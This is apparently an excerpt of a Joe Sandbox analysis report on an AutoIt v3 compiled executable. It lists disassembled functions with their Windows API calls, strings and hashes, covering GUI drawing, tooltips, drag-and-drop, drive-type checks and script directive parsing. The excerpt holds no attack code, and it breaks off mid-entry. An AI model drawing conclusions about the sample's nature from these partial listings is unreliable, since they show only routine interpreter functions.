                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 003B779B
                                                        • GetStockObject.GDI32(00000011), ref: 003B77A6
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003B77B1
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003B77BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: 289825c0720cad17e6156c1ca83e08f7ae3a7d28116be7d8353d9b8eb45f92b5
                                                        • Instruction ID: 062dfd013877b560d48c7b35fd47b4489ad88466e723d52f72f3bdcaa28143ab
                                                        • Opcode Fuzzy Hash: 289825c0720cad17e6156c1ca83e08f7ae3a7d28116be7d8353d9b8eb45f92b5
                                                        • Instruction Fuzzy Hash: 4AA16D71A00605BFEB159BA4DD4AFAB7BAAEF49714F004119FA14EB2E0C770AD00CF64
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 003AAD1E
                                                        • GetDriveTypeW.KERNEL32(?,003CFAC0,?,\\.\,003CF910), ref: 003AADFB
                                                        • SetErrorMode.KERNEL32(00000000,003CFAC0,?,\\.\,003CF910), ref: 003AAF59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: ed584b06a404e6b9d02689a6c1eb271e32b7b169920adb9e1aa068590e5be02d
                                                        • Instruction ID: 78aec563e34a3e3db0a56e43f58baadfc1fe70bac6e7fbaebbfed56ff6de2e8c
                                                        • Opcode Fuzzy Hash: ed584b06a404e6b9d02689a6c1eb271e32b7b169920adb9e1aa068590e5be02d
                                                        • Instruction Fuzzy Hash: 9C5190B2649A09AF8F1FEB14CD92CBD73A5EB0A700B204457E507AB691CB31AD05DB53
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-86951937
                                                        • Opcode ID: f03801388d0b0d77b666027e0c8a23743285f8a72f4e82734c1d70ad7cf12beb
                                                        • Instruction ID: 085e1ea62f5966f1ca8e1ddb9331dacbd6fd7f86c3f57d3d482ccfdeb50ef907
                                                        • Opcode Fuzzy Hash: f03801388d0b0d77b666027e0c8a23743285f8a72f4e82734c1d70ad7cf12beb
                                                        • Instruction Fuzzy Hash: 5881E9B16006056ADB23AF60EC43FBF37A8EF16700F048025F905AF196EB75EE45D662
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 003C9AD2
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003C9B8B
                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 003C9BA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: 0
                                                        • API String ID: 2326795674-4108050209
                                                        • Opcode ID: bf60f8f631730cba0bd92cf75bf461edd6c749c75406620487e9b38afe502550
                                                        • Instruction ID: 97b2cfc095254da581e0f4cbf8ec2749fbf0aa798ff91393ef4b13bf2d75576a
                                                        • Opcode Fuzzy Hash: bf60f8f631730cba0bd92cf75bf461edd6c749c75406620487e9b38afe502550
                                                        • Instruction Fuzzy Hash: 2B02AC31108201AFE726CF24C849FAABBE9FF49314F06852EF999D62A1C735DD54CB52
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 003CA903
                                                        • SetTextColor.GDI32(?,?), ref: 003CA907
                                                        • GetSysColorBrush.USER32(0000000F), ref: 003CA91D
                                                        • GetSysColor.USER32(0000000F), ref: 003CA928
                                                        • CreateSolidBrush.GDI32(?), ref: 003CA92D
                                                        • GetSysColor.USER32(00000011), ref: 003CA945
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003CA953
                                                        • SelectObject.GDI32(?,00000000), ref: 003CA964
                                                        • SetBkColor.GDI32(?,00000000), ref: 003CA96D
                                                        • SelectObject.GDI32(?,?), ref: 003CA97A
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003CA999
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003CA9B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003CA9C5
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003CA9ED
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003CAA14
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 003CAA32
                                                        • DrawFocusRect.USER32(?,?), ref: 003CAA3D
                                                        • GetSysColor.USER32(00000011), ref: 003CAA4B
                                                        • SetTextColor.GDI32(?,00000000), ref: 003CAA53
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003CAA67
                                                        • SelectObject.GDI32(?,003CA5FA), ref: 003CAA7E
                                                        • DeleteObject.GDI32(?), ref: 003CAA89
                                                        • SelectObject.GDI32(?,?), ref: 003CAA8F
                                                        • DeleteObject.GDI32(?), ref: 003CAA94
                                                        • SetTextColor.GDI32(?,?), ref: 003CAA9A
                                                        • SetBkColor.GDI32(?,?), ref: 003CAAA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: 5237d4d2e524e2503a8ac10dae3b102f7783f4e1bf25cf70f22aabae7e301587
                                                        • Instruction ID: 0aba533eccb89560bc015b1e960ed4537c1d7a8d5bab8894c0b88815b401e7d3
                                                        • Opcode Fuzzy Hash: 5237d4d2e524e2503a8ac10dae3b102f7783f4e1bf25cf70f22aabae7e301587
                                                        • Instruction Fuzzy Hash: 2F512B71900618EFDB129FA4DC49EAE7BBAEB08320F154625F911EB2A1D771AD40DB90
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003C8AC1
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C8AD2
                                                        • CharNextW.USER32(0000014E), ref: 003C8B01
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003C8B42
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003C8B58
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C8B69
                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003C8B86
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 003C8BD8
                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003C8BEE
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C8C1F
                                                        • _memset.LIBCMT ref: 003C8C44
                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003C8C8D
                                                        • _memset.LIBCMT ref: 003C8CEC
                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003C8D16
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 003C8D6E
                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 003C8E1B
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 003C8E3D
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C8E87
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C8EB4
                                                        • DrawMenuBar.USER32(?), ref: 003C8EC3
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 003C8EEB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                        • String ID: 0
                                                        • API String ID: 1073566785-4108050209
                                                        • Opcode ID: beb41a66cbc88aac4f221ae4265a7ce4d14c295e17e8f6ef3243b51cae03d651
                                                        • Instruction ID: 25344ef805854ad5aa27aba7a4de6f86f990aee3ae9c768e6a6a70c40089992e
                                                        • Opcode Fuzzy Hash: beb41a66cbc88aac4f221ae4265a7ce4d14c295e17e8f6ef3243b51cae03d651
                                                        • Instruction Fuzzy Hash: 65E15B75900218AEDB229F64CC84FEE7BB9EF09710F11815EF915EA290DB709E81DF60
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 003C49CA
                                                        • GetDesktopWindow.USER32 ref: 003C49DF
                                                        • GetWindowRect.USER32(00000000), ref: 003C49E6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003C4A48
                                                        • DestroyWindow.USER32(?), ref: 003C4A74
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003C4A9D
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C4ABB
                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003C4AE1
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 003C4AF6
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003C4B09
                                                        • IsWindowVisible.USER32(?), ref: 003C4B29
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003C4B44
                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003C4B58
                                                        • GetWindowRect.USER32(?,?), ref: 003C4B70
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 003C4B96
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 003C4BB0
                                                        • CopyRect.USER32(?,?), ref: 003C4BC7
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 003C4C32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: c124fea1182b9f13efbeffd44bd55ebb6f450d223f8f15c4de2f1c252b69de8b
                                                        • Instruction ID: 56e7237c23f119d6790b7104de168182d567e414a741727e16111e5922f687ee
                                                        • Opcode Fuzzy Hash: c124fea1182b9f13efbeffd44bd55ebb6f450d223f8f15c4de2f1c252b69de8b
                                                        • Instruction Fuzzy Hash: 19B15871604340AFDB06DF64C898F6ABBE9AF88314F00891DF999DB2A1D771EC05CB95
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003A44AC
                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003A44D2
                                                        • _wcscpy.LIBCMT ref: 003A4500
                                                        • _wcscmp.LIBCMT ref: 003A450B
                                                        • _wcscat.LIBCMT ref: 003A4521
                                                        • _wcsstr.LIBCMT ref: 003A452C
                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003A4548
                                                        • _wcscat.LIBCMT ref: 003A4591
                                                        • _wcscat.LIBCMT ref: 003A4598
                                                        • _wcsncpy.LIBCMT ref: 003A45C3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                        • API String ID: 699586101-1459072770
                                                        • Opcode ID: df3ce4859cd65bb66271047f4c2bb49670fc5ff8dd30559b17156486442e7ded
                                                        • Instruction ID: 0239960c095874f0559db2c14441ff8574abc295f4a180d294694a75e2627a2e
                                                        • Opcode Fuzzy Hash: df3ce4859cd65bb66271047f4c2bb49670fc5ff8dd30559b17156486442e7ded
                                                        • Instruction Fuzzy Hash: 0A41F731A002047FDB17AB758C47EFF776CDF82710F00446AFA05EA192EB75AA0197A9
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003428BC
                                                        • GetSystemMetrics.USER32(00000007), ref: 003428C4
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003428EF
                                                        • GetSystemMetrics.USER32(00000008), ref: 003428F7
                                                        • GetSystemMetrics.USER32(00000004), ref: 0034291C
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00342939
                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00342949
                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0034297C
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00342990
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 003429AE
                                                        • GetStockObject.GDI32(00000011), ref: 003429CA
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 003429D5
                                                          • Part of subcall function 00342344: GetCursorPos.USER32(?), ref: 00342357
                                                          • Part of subcall function 00342344: ScreenToClient.USER32(004057B0,?), ref: 00342374
                                                          • Part of subcall function 00342344: GetAsyncKeyState.USER32(00000001), ref: 00342399
                                                          • Part of subcall function 00342344: GetAsyncKeyState.USER32(00000002), ref: 003423A7
                                                        • SetTimer.USER32(00000000,00000000,00000028,00341256), ref: 003429FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
                                                        • Opcode ID: 6c318ddd595f92f2fd44ba48e5315251ae4b8700aa4ae5413de83beeee88b726
                                                        • Instruction ID: 0480966192f2b4a4a9e1861e2bcbf8910786f59a559fd1a1d25d11a7922678f6
                                                        • Opcode Fuzzy Hash: 6c318ddd595f92f2fd44ba48e5315251ae4b8700aa4ae5413de83beeee88b726
                                                        • Instruction Fuzzy Hash: 73B17D7160020ADFDB16EFA8CC45BAE7BB9FB48310F518129FA15EB290DB74A850CF54
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0039A47A
                                                        • __swprintf.LIBCMT ref: 0039A51B
                                                        • _wcscmp.LIBCMT ref: 0039A52E
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0039A583
                                                        • _wcscmp.LIBCMT ref: 0039A5BF
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0039A5F6
                                                        • GetDlgCtrlID.USER32(?), ref: 0039A648
                                                        • GetWindowRect.USER32(?,?), ref: 0039A67E
                                                        • GetParent.USER32(?), ref: 0039A69C
                                                        • ScreenToClient.USER32(00000000), ref: 0039A6A3
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0039A71D
                                                        • _wcscmp.LIBCMT ref: 0039A731
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0039A757
                                                        • _wcscmp.LIBCMT ref: 0039A76B
                                                          • Part of subcall function 0036362C: _iswctype.LIBCMT ref: 00363634
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                        • String ID: %s%u
                                                        • API String ID: 3744389584-679674701
                                                        • Opcode ID: b3da6c3cfd62abdc2121007177da8b53422183fefa59c181f0eabf3b52698550
                                                        • Instruction ID: 48b6ef226fb5e130556d8dabd4b1a451a928b3f921b0c7138a5d0fd7a8f8ab2f
                                                        • Opcode Fuzzy Hash: b3da6c3cfd62abdc2121007177da8b53422183fefa59c181f0eabf3b52698550
                                                        • Instruction Fuzzy Hash: 21A1EF31204B06AFDB16DFA4C885FAAB7E8FF44314F008629F999C6190DB30E955CBD2
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0039AF18
                                                        • _wcscmp.LIBCMT ref: 0039AF29
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0039AF51
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0039AF6E
                                                        • _wcscmp.LIBCMT ref: 0039AF8C
                                                        • _wcsstr.LIBCMT ref: 0039AF9D
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0039AFD5
                                                        • _wcscmp.LIBCMT ref: 0039AFE5
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0039B00C
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0039B055
                                                        • _wcscmp.LIBCMT ref: 0039B065
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0039B08D
                                                        • GetWindowRect.USER32(00000004,?), ref: 0039B0F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        • Opcode ID: 29b805c097c8434ae20ea2f267de2314d3bdb05a317783ab53f54274837f3cda
                                                        • Instruction ID: 1157e603753ef71af6df9e5d7ff6acc8ab7409ba9b3eaf54923688716bc10065
                                                        • Opcode Fuzzy Hash: 29b805c097c8434ae20ea2f267de2314d3bdb05a317783ab53f54274837f3cda
                                                        • Instruction Fuzzy Hash: 8781E1711082059FDF02DF14D985FAABBECEF44314F04856AFD868A096DB30ED49CBA1
                                                        APIs
                                                          • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                        • DragQueryPoint.SHELL32(?,?), ref: 003CC627
                                                          • Part of subcall function 003CAB37: ClientToScreen.USER32(?,?), ref: 003CAB60
                                                          • Part of subcall function 003CAB37: GetWindowRect.USER32(?,?), ref: 003CABD6
                                                          • Part of subcall function 003CAB37: PtInRect.USER32(?,?,003CC014), ref: 003CABE6
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003CC690
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003CC69B
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003CC6BE
                                                        • _wcscat.LIBCMT ref: 003CC6EE
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003CC705
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003CC71E
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003CC735
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003CC757
                                                        • DragFinish.SHELL32(?), ref: 003CC75E
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003CC851
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb@
                                                        • API String ID: 169749273-4025947017
                                                        • Opcode ID: c8c53b73610f10fa865f64f4581e0e6f60ae117b0a688be5e77d0eb5be8012ee
                                                        • Instruction ID: 5a8b1d16598a4cfc2812773d9fd7a52d09a46ca466512320537ed6e59cb07d6e
                                                        • Opcode Fuzzy Hash: c8c53b73610f10fa865f64f4581e0e6f60ae117b0a688be5e77d0eb5be8012ee
                                                        • Instruction Fuzzy Hash: 47616271508304AFC702EF64DC85EAFBBE9EF89710F00092EF595DA1A1DB70A949CB52
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
